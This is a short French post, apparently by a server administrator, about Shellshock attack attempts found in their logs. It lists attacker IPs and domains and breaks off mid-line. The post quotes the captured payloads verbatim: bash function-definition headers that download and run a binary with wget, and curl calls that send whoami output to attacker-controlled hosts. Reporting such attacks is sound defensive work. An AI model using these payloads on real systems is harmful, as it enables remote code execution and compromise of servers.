Attaque sur mon serveur :
WinInet Test | ||||
curl/7.19.7 (i386-redhat-linux-gnu) libcurl/7.19.7 NSS/3.13.6.0 zlib/1.2.3 libidn/1.18 libssh2/1.4.2 | cURL | |||
() { :;}; /bin/bash -c \\ »wget http://ntontomou.com/s ;chmod +x s ; ./s\\« |
Un petit Whois sur : http://www.ntontomou.com/ : https://who.is/whois/ntontomou.com …. il reste plus qu’a contacter http://www.enom.com. Misère.
D’après les logs c’est pas son premier essai :
() { :;}; /bin/bash -c \ »curl http://ntontomou.com/custom/ping.php?domain=sphinux.org\\&whoami=`whoami`\ »
D’abord du PHP puis maintenant un soft en C.
Pour plus d’information sur shellshock : http://linuxfr.org/news/une-faille-nommee-shellshock
Et c’est pas le seul :
- 2.133.128.30 : KZ : IP_Zebra_Telecom.
- 37.1.207.83 : NL :
- ntontomou.com : PA :
- best-home-based-business-idea.com : CN :
Dans les logs :
() { :;}; /bin/bash -c \"curl -O http://37.1.207.83/log.php?get=aHR0cDovL2JlbGxldnVlaG91c2UuY29tLw==\" () { :;}; /bin/bash -c \"curl http://ntontomou.com/custom/ping.php?domain=bellevuehouse.com\\&whoami=`whoami`\" () { :;}; /bin/bash -c \"wget http://ntontomou.com/custom/ping.php?domain=bellevuehouse.com\\&whoami=`whoami`\" () { :;}; echo; /usr/bin/wget http://2.133.128.30/robots.txt?http://www.1001vrs.com/cgi-bin/directories/counter/countcombb.pl () { :;};echo kp8i7xybgo7htfu0hge3$(curl 'http://best-home-based-business-idea.com/bash_count.php?%62%65%6C%6C%65%76%75%65%68